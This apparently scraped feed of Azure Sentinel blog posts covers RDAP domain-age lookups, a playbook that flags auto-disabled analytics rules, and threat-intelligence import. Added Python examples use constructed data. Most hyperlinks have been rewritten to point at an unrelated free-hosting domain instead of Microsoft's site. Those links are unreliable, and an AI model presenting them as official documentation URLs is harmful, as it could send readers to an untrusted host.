When we have a match we then break out of the ForEach and return the value back to CheckDomains().</P> <P>Now that we have the RDAP server that is responsible for the TLD, it’s time to call it and get the information we want.</P> <P>&nbsp;</P> <P><STRONG>QueryRDAP</STRONG></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_9-1632321618772.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312079iC908B23EFF5EB41D/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_9-1632321618772.png" alt="MattEgen_9-1632321618772.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>This function is very straightforward as it simply calls the passed-in URL, deserializes the results (if any) into an RDAPResponse object and then returns that back to CheckDomains.&nbsp; CheckDomains then parses the returned object to find the “events” node and specifically one with an eventType of “registration”. If we find one, we create a new “RDAPUpdate” object which just holds the domain name we looked up along with the registration date that was returned. 
This object is then passed to the WriteData function which will store it into Sentinel / Log Analytics.</P> <P>&nbsp;</P> <P><STRONG>WriteData()</STRONG></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_10-1632321618775.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312080i090E93FE50F858A1/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_10-1632321618775.png" alt="MattEgen_10-1632321618775.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>WriteData is possibly the simplest function in all of this code as it just takes the passed object, converts it into a JSON string, builds a signature (using the Workspace ID and keys from earlier) and then calls PostData which does the actual write to Sentinel / Log Analytics.</P> <P>&nbsp;</P> <P><STRONG>PostData()</STRONG></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_11-1632321618780.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312081i23CB68C7A25A6098/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_11-1632321618780.png" alt="MattEgen_11-1632321618780.png" /></span></P> <P>&nbsp;</P> <P>And finally, PostData() calls the Log Analytics API and commits our data.&nbsp;</P> <P>&nbsp;</P> <P><STRONG>So…I’ve got a bunch of domain names and their registration dates, now what?</STRONG></P> <P>&nbsp;</P> <P>Going back to our original need (alert on domains that are younger than 30 days), we can write a very simple query in the Logs blade of Sentinel to search for these:</P> <P>&nbsp;</P> <PRE>ResolvedDomains_CL<BR />| where TimeGenerated &gt;= ago(1h)<BR />| where registrationDate_t &gt;= ago(30d)</PRE> <P>And to automate this query, we could convert it into an Analytics rule to generate an Incident for an analyst to review by selecting the “New Alert” drop down and choosing “Create Azure Sentinel 
Alert”</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_12-1632321618785.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312082i8DCFE5860C45BDFF/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_12-1632321618785.png" alt="MattEgen_12-1632321618785.png" /></span></P> <P>&nbsp;</P> <P>Another use case could be to create an enrichment query to add registration data during an investigation.&nbsp; For example, create a join() between a domain source table and the ResolvedDomains_CL table to add in the registration date for any domains seen, and then add that data to an analytic using the new <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-alert-enrichment-custom-details-and-entity-mapping/ba-p/2195409" target="_blank" rel="noopener">Custom Details feature</A>.</P> <P>&nbsp;</P> <H2><STRONG>Next steps / further improvements</STRONG></H2> <P>&nbsp;</P> <P>One thing I noticed in creating this example was that not every top-level domain has activated an RDAP server yet. Notably, a number of country TLDs are still using the traditional WHOIS infrastructure (this is why I added the ability to exclude domains and TLDs in the GetDomainsForRDAP Sentinel Function).&nbsp; As a next step for this project, I am going to look to add traditional WHOIS queries (via a TCP connection to port 43) in cases where RDAP cannot find a domain or returns an error. Also, the code currently doesn’t handle raw IP addresses (either IPv4 or IPv6) and instead just does a lookup and fails. I’m looking at modifying the code to support RDAP queries for IP addresses as well, but since it’s an IP address it doesn’t have a “registration date” per se. 
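</P> <P>As an added example, not the RDAPQuery project's C# code, here is the CheckDomains pipeline walked through above in Python, including the no-RDAP-server case this section mentions (bootstrap_tld returns None) and the Data Collector API signing that WriteData/PostData perform. It assumes constructed inputs, all made up: a bootstrap excerpt in the shape of IANA's dns.json, an RDAP domain response (whose event field is eventAction per RFC 9083, where the post says eventType), a fixed clock and a placeholder workspace key.</P>

```python
import base64
import hashlib
import hmac
import json
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime
from typing import Callable, Dict, Optional

# Constructed excerpt in the shape of https://data.iana.org/rdap/dns.json (RFC 7484):
# each "services" entry is [[tld, ...], [rdap_base_url, ...]]. Hostnames are made up.
BOOTSTRAP_JSON = json.dumps({"version": "1.0", "services": [
    [["com", "net"], ["https://rdap.registry-a.example/v1/"]],
    [["org"], ["https://rdap.registry-b.example/"]],
]})

# Constructed RDAP domain response (RFC 9083 shape). RFC 9083 names the field
# "eventAction"; the post calls it eventType when describing its C# classes.
RDAP_RESPONSE_JSON = json.dumps({"objectClassName": "domain", "ldhName": "NEWLY-REGISTERED.COM",
    "events": [{"eventAction": "registration", "eventDate": "2021-09-20T10:15:00Z"},
               {"eventAction": "last changed", "eventDate": "2021-09-21T00:00:00Z"}]})

# Stand-in for the HTTP fetch (URL -> body) so the example runs offline; constructed.
CONSTRUCTED_RESPONSES: Dict[str, str] = {
    "https://rdap.registry-a.example/v1/domain/newly-registered.com": RDAP_RESPONSE_JSON}

# Fixed "now" and workspace key so results are deterministic (both constructed).
EXAMPLE_NOW = datetime(2021, 9, 29, 23, 14, 29, tzinfo=timezone.utc)
EXAMPLE_SHARED_KEY = base64.b64encode(b"k" * 32).decode()


def bootstrap_tld(bootstrap_json: str, tld: str) -> Optional[str]:
    """RDAP base URL serving `tld`, or None when IANA lists no RDAP server for it
    (the ccTLD case the post works around with its exclusion list)."""
    wanted = tld.lower().lstrip(".")
    for tlds, urls in json.loads(bootstrap_json)["services"]:
        if wanted in (t.lower() for t in tlds):
            # RFC 7484 allows several base URLs; prefer https and keep a trailing "/".
            url = next((u for u in urls if u.startswith("https://")), urls[0])
            return url if url.endswith("/") else url + "/"
    return None


def rdap_domain_url(base_url: str, domain: str) -> str:
    """RDAP domain lookup path is <base>domain/<name> (RFC 9082)."""
    return f"{base_url}domain/{domain.lower()}"


def registration_date(rdap_json: str) -> Optional[datetime]:
    """Pick the 'registration' event out of an RDAP domain response."""
    for event in json.loads(rdap_json).get("events", []):
        if event.get("eventAction") == "registration":
            # eventDate is RFC 3339; older Pythons need "Z" spelled as "+00:00".
            return datetime.fromisoformat(event["eventDate"].replace("Z", "+00:00"))
    return None


def is_young_domain(registered: datetime, now: datetime, max_age_days: int = 30) -> bool:
    """The detection the post's KQL performs: registrationDate_t >= ago(30d)."""
    return now - registered < timedelta(days=max_age_days)


def check_domain(domain: str, now: datetime = EXAMPLE_NOW,
                 fetch: Callable[[str], Optional[str]] = CONSTRUCTED_RESPONSES.get) -> Optional[dict]:
    """CheckDomains in miniature: bootstrap the TLD, query RDAP, pull the registration
    date and shape the record WriteData sends. None = no RDAP server or no answer."""
    base = bootstrap_tld(BOOTSTRAP_JSON, domain.rsplit(".", 1)[-1])
    if base is None:
        return None
    url = rdap_domain_url(base, domain)
    body = fetch(url)
    registered = registration_date(body) if body else None
    if registered is None:
        return None
    return {"domainName": domain, "registrationDate": registered.isoformat(),
            "rdapUrl": url, "youngerThan30Days": is_young_domain(registered, now)}


def log_analytics_headers(workspace_id: str, shared_key: str, body: str,
                          log_type: str, date: Optional[datetime] = None) -> Dict[str, str]:
    """Sign a Data Collector API POST the way WriteData/PostData do: HMAC-SHA256 over the
    canonical string, keyed with the base64-decoded workspace key. `log_type` becomes
    the <LogName>_CL table (ResolvedDomains_CL in the post)."""
    rfc1123_date = format_datetime(date or datetime.now(timezone.utc), usegmt=True)
    string_to_sign = (f"POST\n{len(body.encode('utf-8'))}\napplication/json\n"
                      f"x-ms-date:{rfc1123_date}\n/api/logs")
    digest = hmac.new(base64.b64decode(shared_key), string_to_sign.encode("utf-8"),
                      hashlib.sha256).digest()
    return {"Content-Type": "application/json", "Log-Type": log_type, "x-ms-date": rfc1123_date,
            "Authorization": f"SharedKey {workspace_id}:{base64.b64encode(digest).decode()}"}


if __name__ == "__main__":
    record = check_domain("newly-registered.com")
    print(json.dumps(record, indent=2))
    print(log_analytics_headers("WORKSPACE-ID-PLACEHOLDER", EXAMPLE_SHARED_KEY,
                                json.dumps([record]), "ResolvedDomains", EXAMPLE_NOW))
```
<P>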
I would love some feedback on what you think would be useful information from an IP address.&nbsp; Look for this update soon.</P> <P>&nbsp;</P> <P>Until next time, happy hunting!</P> <P>&nbsp;</P> Wed, 29 Sep 2021 23:14:29 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/querying-whois-registration-data-access-protocol-rdap-with-azure/ba-p/2774502 Matt Egen 2021-09-29T23:14:29Z Monitoring Azure Sentinel Analytical Rules – Push Health Notifications https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/monitoring-azure-sentinel-analytical-rules-push-health/ba-p/2793694 <P>Azure Sentinel Analytical rules help Security Teams discover threats and anomalous behaviors to ensure full security coverage for your environment.</P> <P>&nbsp;</P> <P>After connecting our data sources to Azure Sentinel, we first enable Analytical rules. Each data source comes with built-in, out-of-the-box templates to create threat detection rules.</P> <P>&nbsp;</P> <P>Analytics rules search for specific events or sets of events across your environment, alert you when certain event thresholds or conditions are reached, generate incidents for the SOC to triage and investigate, and respond to threats with automated tracking and remediation processes.</P> <P>&nbsp;</P> <H3>Scenario: A scheduled rule failed to execute, or appears with AUTO DISABLED added to the name</H3> <P>It's a rare occurrence that a scheduled query rule fails to run, but it can happen. 
As shown in the image below, a customer had located several <EM>Scheduled Analytics Rules</EM> that had been auto-disabled in their environment.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Sreedhar_Ande_0-1632876975147.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/313464iFB009E7841CF960B/image-size/large?v=v2&amp;px=999" role="button" title="Sreedhar_Ande_0-1632876975147.png" alt="Sreedhar_Ande_0-1632876975147.png" /></span></P> <P>&nbsp;</P> <P>Azure Sentinel classifies failures up front as either <STRONG>transient</STRONG> or <STRONG>permanent</STRONG>, based on the specific type of the failure and the circumstances that led to it.</P> <P>&nbsp;</P> <P><FONT size="5">Transient failure</FONT></P> <P>&nbsp;</P> <P><FONT size="3">A transient failure occurs due to a circumstance which is temporary and will soon return to normal, at which point the rule execution will succeed. Some examples of failures that Azure Sentinel classifies as transient are:</FONT></P> <UL> <LI>A rule query takes too long to run and times out.</LI> <LI>Connectivity issues between data sources and Log Analytics, or between Log Analytics and Azure Sentinel.</LI> <LI>Any other new and unknown failure is considered transient.</LI> </UL> <P>In the event of a transient failure, Azure Sentinel continues trying to execute the rule again after predetermined and ever-increasing intervals, up to a point. After that, the rule will run again only at its next scheduled time. A rule will <EM><U>never be auto-disabled due to a transient failure</U></EM>.</P> <P>&nbsp;</P> <P><FONT size="5">Permanent failure</FONT></P> <P>&nbsp;</P> <P>A permanent failure occurs due to a change in the conditions that allow the rule to run, which without human intervention will not return to their former status. 
The following are some examples of failures that are classified as permanent:</P> <UL> <LI>The target workspace (on which the rule query operated) has been deleted.</LI> <LI>The target table (on which the rule query operated) has been deleted.</LI> <LI>Azure Sentinel had been removed from the target workspace.</LI> <LI>A function used by the rule query is no longer valid; it has been either modified or removed.</LI> <LI>Permissions to one of the data sources of the rule query were changed.</LI> <LI>One of the data sources of the rule query was deleted or disconnected.</LI> </UL> <P>In the event of a predetermined number of consecutive permanent failures, of the same type and on the same rule, Azure Sentinel stops trying to execute the rule, and takes the following steps:</P> <UL> <LI>Disables the rule.</LI> <LI>Adds the words&nbsp;<STRONG>"AUTO DISABLED"</STRONG>&nbsp;to the beginning of the rule's name.</LI> <LI>Adds the reason for the failure (and the disabling) to the rule's description.</LI> </UL> <P>It's a rare occurrence that a scheduled query rule gets auto-disabled, but it can happen. When it does, the SOC faces the following challenges in triaging, investigating and responding to threats with automated tracking and remediation processes:</P> <UL> <LI>Alerts/Incidents will not be generated.</LI> <LI>Automated threat responses (Automation Rules/Playbooks) for your rules will not be triggered.</LI> </UL> <P>As of today, SOC Managers/SOC Analysts have to check the rule list regularly and manually for the presence of auto-disabled rules; there is no easy way to detect auto-disabled rules automatically.</P> <P>&nbsp;</P> <P>There has been a need for a solution that will notify SOC Managers/SOC Analysts when a scheduled analytic rule has been auto-disabled. 
This blog details how to monitor Azure Sentinel Analytic rules periodically and notify the SOC Team immediately, by email or Teams post, when any analytic rule gets auto-disabled, using&nbsp;<A href="#" target="_blank" rel="noopener">this Playbook</A>.</P> <H2>Deployment</H2> <P>This section explains how to use the ARM template to deploy the playbook that sends notifications when an Azure Sentinel Analytic rule gets auto-disabled.</P> <P>To access the ARM template, navigate to <A href="#" target="_blank" rel="noopener">this Playbook</A>.</P> <OL> <LI>Click the&nbsp;<STRONG>Deploy to Azure/Deploy to Azure Gov</STRONG>&nbsp;button.</LI> <LI>Enter values for the following parameters: <UL class="lia-list-style-type-circle"> <LI>"Azure Sentinel Workspace Name": Azure Log Analytics Workspace Name</LI> <LI>"Azure Sentinel Workspace Resource Group": Azure Sentinel Workspace Resource Group Name</LI> <LI>"Mailing List": Email IDs separated by semicolons (;)</LI> <LI>"Teams Id": Microsoft Teams Id</LI> <LI>"Channel Id": Microsoft Teams Channel Id</LI> </UL> </LI> <LI>Click “Review &amp; Create”; after successful validation, click Create.</LI> </OL> <H2>Playbook Components</H2> <P>This section explains the trigger and actions inside the workflow:</P> <UL> <LI>Recurrence trigger - The Logic App is activated by a Recurrence trigger whose frequency of execution can be adjusted to your requirements.</LI> <LI>HTTP GET – The Logic App calls the Azure Sentinel Analytical rules REST API endpoint to get all the rules: <UL> <LI>GET <A href="#" target="_blank" rel="noopener">https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/providers/Microsoft.SecurityInsights/alertRules?api-version=2020-01-01</A></LI> </UL> </LI> <LI>For_Each – Loops through all the Analytical rules and determines whether there are any rules that have the enabled property set to “false” and whose Display Name 
contains “Auto Disabled”</LI> <LI>Send Email – Sends an email to the recipients provided by the user</LI> <LI>Post Message – Posts a message to the Teams channel provided by the user</LI> </UL> <H2>Post Deployment</H2> <P>This section explains the steps to perform after successful deployment:</P> <P>1. Authorize API Connections - used to connect Logic Apps to SaaS services, such as Office 365 &amp; Teams</P> <P class="lia-indent-padding-left-60px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Sreedhar_Ande_1-1632877861900.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/313466iFEBE9C9E4E4E5809/image-size/large?v=v2&amp;px=999" role="button" title="Sreedhar_Ande_1-1632877861900.png" alt="Sreedhar_Ande_1-1632877861900.png" /></span></P> <P>2.&nbsp;This playbook uses a Managed Identity, which is granted permissions through Azure role-based access control (Azure RBAC). The managed identity is authenticated with Azure AD, so you don’t have to store any credentials in code.</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Sreedhar_Ande_2-1632877932666.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/313467i6C2438613D15A865/image-size/large?v=v2&amp;px=999" role="button" title="Sreedhar_Ande_2-1632877932666.png" alt="Sreedhar_Ande_2-1632877932666.png" /></span></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Sreedhar_Ande_3-1632877959970.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/313468i8B20A19AE27BA1BA/image-size/large?v=v2&amp;px=999" role="button" title="Sreedhar_Ande_3-1632877959970.png" alt="Sreedhar_Ande_3-1632877959970.png" /></span></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P 
class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Sreedhar_Ande_4-1632877983177.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/313469i503647B0FBB9CA32/image-size/large?v=v2&amp;px=999" role="button" title="Sreedhar_Ande_4-1632877983177.png" alt="Sreedhar_Ande_4-1632877983177.png" /></span></P> <H2><FONT size="5">Video Tutorial</FONT></H2> <P><LI-VIDEO vid="https://www.youtube.com/watch?v=ULyLB9LOs2g" align="center" size="small" width="200" height="113" uploading="false" thumbnail="https://i.ytimg.com/vi/ULyLB9LOs2g/hqdefault.jpg" external="url"></LI-VIDEO></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><FONT size="5">Conclusion</FONT></P> <P>With this Playbook, Security teams can discover the presence of any auto-disabled rules round-the-clock. It provides near real-time visibility via email/Teams notifications. This will be handy for monitoring the health of Azure Sentinel Analytical rules and avoiding any interruptions in discovering threats and anomalous behaviors, and in remediation processes, across the data sources/logs connected to your environment. 
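</P> <P>The rule-health check the playbook's For_Each step performs, as an added Python example that is not the playbook's own Logic App definition; it assumes a constructed two-page alertRules response with placeholder URLs and rule names, and follows nextLink paging in case the rule list spans more than one page.</P>

```python
import json
from typing import Callable, Dict, List, Optional

# Constructed two-page response from the alertRules list API (each page is
# {"value": [...], "nextLink": ...}); URLs and rule names are placeholders.
FIRST_PAGE_URL = ("https://management.azure.com/PLACEHOLDER-WORKSPACE-PATH/providers/"
                  "Microsoft.SecurityInsights/alertRules?api-version=2020-01-01")
NEXT_PAGE_URL = FIRST_PAGE_URL + "&$skipToken=constructed-page-2"
CONSTRUCTED_PAGES: Dict[str, str] = {
    FIRST_PAGE_URL: json.dumps({"value": [
        {"name": "rule-1", "properties": {"enabled": False,
            "displayName": "AUTO DISABLED Suspicious sign-in burst",
            "description": "Constructed: rule auto-disabled because the target table no longer exists."}},
        {"name": "rule-2", "properties": {"enabled": True, "displayName": "Password spray",
            "description": ""}},
    ], "nextLink": NEXT_PAGE_URL}),
    NEXT_PAGE_URL: json.dumps({"value": [
        # Disabled on purpose by an analyst: no AUTO DISABLED prefix, so nobody should be paged.
        {"name": "rule-3", "properties": {"enabled": False, "displayName": "Legacy VPN alert",
            "description": "Retired"}},
    ]}),
}


def list_alert_rules(first_url: str, fetch: Callable[[str], Optional[str]]) -> List[dict]:
    """GET the rule list and keep following nextLink until the API stops paging."""
    rules, url = [], first_url
    while url:
        body = fetch(url)
        if body is None:
            raise RuntimeError(f"no response for {url}")
        page = json.loads(body)
        rules.extend(page.get("value", []))
        url = page.get("nextLink")
    return rules


def find_auto_disabled(rules: List[dict]) -> List[dict]:
    """The playbook's For_Each condition: enabled == false AND the display name carries
    the AUTO DISABLED marker Sentinel prepends. Both checks matter: a rule an analyst
    turned off deliberately is disabled but not auto-disabled."""
    hits = []
    for rule in rules:
        props = rule.get("properties", {})
        if props.get("enabled") is False and "auto disabled" in props.get("displayName", "").lower():
            hits.append(rule)
    return hits


def build_notification(flagged: List[dict]) -> str:
    """Body for the Send Email / Post Message steps; the description field holds the
    failure reason Sentinel wrote when it disabled the rule."""
    if not flagged:
        return "No auto-disabled analytics rules found."
    lines = [f"{len(flagged)} auto-disabled analytics rule(s) need attention:"]
    for rule in flagged:
        props = rule["properties"]
        reason = props.get("description") or "no reason recorded"
        lines.append(f"- {props['displayName']} ({rule['name']}): {reason}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(build_notification(find_auto_disabled(list_alert_rules(FIRST_PAGE_URL, CONSTRUCTED_PAGES.get))))
```
<P>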
Try it out, and <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/bd-p/AzureSentinel" target="_blank" rel="noopener">let us know</A> what you think!</P> <P>&nbsp;</P> <P><EM>Thanks to <A href="https://gorovian.000webhostapp.com/?exam=t5/user/viewprofilepage/user-id/124214" target="_blank" rel="noopener">@Yuri Diogenes</A>, <A href="https://gorovian.000webhostapp.com/?exam=t5/user/viewprofilepage/user-id/87823" target="_blank" rel="noopener">@Cristhofer Munoz</A>, for their input into this blog post.</EM></P> Mon, 04 Oct 2021 22:24:55 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/monitoring-azure-sentinel-analytical-rules-push-health/ba-p/2793694 Sreedhar_Ande 2021-10-04T22:24:55Z General Availability of Azure Sentinel Threat Intelligence in Public and Azure Government cloud https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/general-availability-of-azure-sentinel-threat-intelligence-in/ba-p/2525227 <P><FONT size="5"><STRONG>Introduction</STRONG></FONT></P> <P><FONT size="4">In today’s era of growing cyber-attacks, Cyber Threat Intelligence (CTI) is a key factor in helping Security Operations Center (SOC) analysts triage and respond to incidents. 
Azure Sentinel is a cloud native SIEM solution that allows customers to import threat intelligence data from various places such as paid threat feeds, open-source feeds, and threat intelligence sharing communities like ISACs. Today we are announcing the <STRONG>General Availability (GA)</STRONG> of <STRONG>Azure Sentinel Threat Intelligence</STRONG> in Public cloud and Azure Government cloud within 30 days from today.</FONT></P> <P>&nbsp;</P> <P><FONT size="4">Azure Sentinel supports open-source standards such as STIX/TAXII to bring threat intelligence data into the product. STIX is the data format and TAXII is the sharing protocol widely used in the industry for sharing threat intelligence data. Azure Sentinel is one of the major adopters of STIX/TAXII 2.x and promotes this industry standard for sharing threat intelligence data.</FONT></P> <P>&nbsp;</P> <P><FONT size="4">Azure Sentinel also offers a first-class UI to create, search, sort, filter, and tag threat intelligence data in the product without writing any queries.</FONT></P> <P>&nbsp;</P> <P><FONT size="4">In this blog, we will cover:<SPAN 
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></P> <OL> <LI data-leveltext="%1." data-font="Calibri" data-listid="2" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><FONT size="4"><SPAN data-contrast="auto">Easy ways of getting threat intelligence data using TAXII data connector</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="2" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><FONT size="4"><SPAN data-contrast="auto">Management of&nbsp;threat intelligence data in Azure Sentinel</SPAN></FONT></LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="2" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><FONT size="4"><SPAN data-contrast="auto">Putting&nbsp;threat intelligence to use with out-of-the-box analytic rules</SPAN></FONT></LI> <LI data-leveltext="%1." 
data-font="Calibri" data-listid="2" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><FONT size="4"><SPAN data-contrast="auto">Getting&nbsp;insights into threat intelligence with Workbooks</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></LI> </OL> <P>&nbsp;</P> <P><FONT size="5"><STRONG>Enable the Threat Intelligence – TAXII data connector in Azure Sentinel</STRONG></FONT></P> <P><FONT size="4"><SPAN class="TextRun SCXW173381353 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW173381353 BCX0">STIX/TAXII is the most widely used industry standard for sharing threat intelligence data.<SPAN>&nbsp;</SPAN></SPAN></SPAN><A class="Hyperlink SCXW173381353 BCX0" href="#" target="_blank" rel="noreferrer noopener"><SPAN class="TextRun Underlined SCXW173381353 BCX0" data-contrast="none"><SPAN class="NormalTextRun SCXW173381353 BCX0" data-ccp-charstyle="Hyperlink">STIX is the data format and TAXII is the protocol</SPAN></SPAN></A><SPAN class="TextRun SCXW173381353 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW173381353 BCX0"><SPAN>&nbsp;</SPAN>used to share threat intelligence data. 
Azure Sentinel offers a built-in TAXII client to import threat intelligence data from TAXII 2.x servers in</SPAN><SPAN class="NormalTextRun SCXW173381353 BCX0"><SPAN>&nbsp;</SPAN>the</SPAN><SPAN class="NormalTextRun SCXW173381353 BCX0"><SPAN>&nbsp;</SPAN>form of a data connector.<SPAN>&nbsp;</SPAN></SPAN></SPAN><SPAN class="EOP SCXW173381353 BCX0" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Image 1.png" style="width: 374px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/294137i65003CE0EBB6CEEB/image-size/large?v=v2&amp;px=999" role="button" title="Image 1.png" alt="Image 1.png" /></span></FONT></P> <P>&nbsp;</P> <P><FONT size="4"><SPAN class="TextRun SCXW119929372 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW119929372 BCX0">To<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW119929372 BCX0">import</SPAN><SPAN class="NormalTextRun SCXW119929372 BCX0"><SPAN>&nbsp;</SPAN>threat intelligence data from a TAXII 2.x server<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW119929372 BCX0">in</SPAN><SPAN class="NormalTextRun SCXW119929372 BCX0">to Azure Sentinel,<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW119929372 BCX0">navigate to the TAXII data connector page under the Data connector gallery of Azure Sentinel.<SPAN>&nbsp;</SPAN></SPAN></SPAN><SPAN class="EOP SCXW119929372 BCX0" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Image 2.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/294150i1CA8271D6D4DA2DC/image-size/large?v=v2&amp;px=999" role="button" title="Image 2.png" alt="Image 
2.png" /></span></FONT></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><FONT size="4"><SPAN data-contrast="none">To learn how to configure Threat Intelligence&nbsp;-&nbsp;TAXII data connector&nbsp;in Azure Sentinel step by step visit the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Threat Intelligence – TAXII documentation</SPAN></A><SPAN data-contrast="none">.&nbsp;</SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="5"><STRONG>Manage threat intelligence data in Azure Sentinel</STRONG></FONT></P> <P><FONT size="4"><SPAN class="TextRun SCXW171574567 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW171574567 BCX0">The Threat Intelligence blade in Azure Sentinel is a one-stop location to create, view, search, sort, filter</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0">,</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0"><SPAN>&nbsp;</SPAN>and tag threat intelligence indicators.<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0">This area allows creation of threat intelligence indicators from within the Azure Sentinel interface. Tagging<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0">of<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0">indicators of compromise</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0"><SPAN>&nbsp;</SPAN>(IOC)</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0"><SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0">is</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0"><SPAN>&nbsp;</SPAN>also possible from this area. 
This helps group IOCs and relate them to particular cases and incidents.</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0"><SPAN>&nbsp;</SPAN>Searching, filtering, and sorting of threat intelligence data are also available in the product.</SPAN></SPAN><SPAN class="EOP SCXW171574567 BCX0" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Image 4.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/294152iD55622636E19BA32/image-size/large?v=v2&amp;px=999" role="button" title="Image 4.png" alt="Image 4.png" 
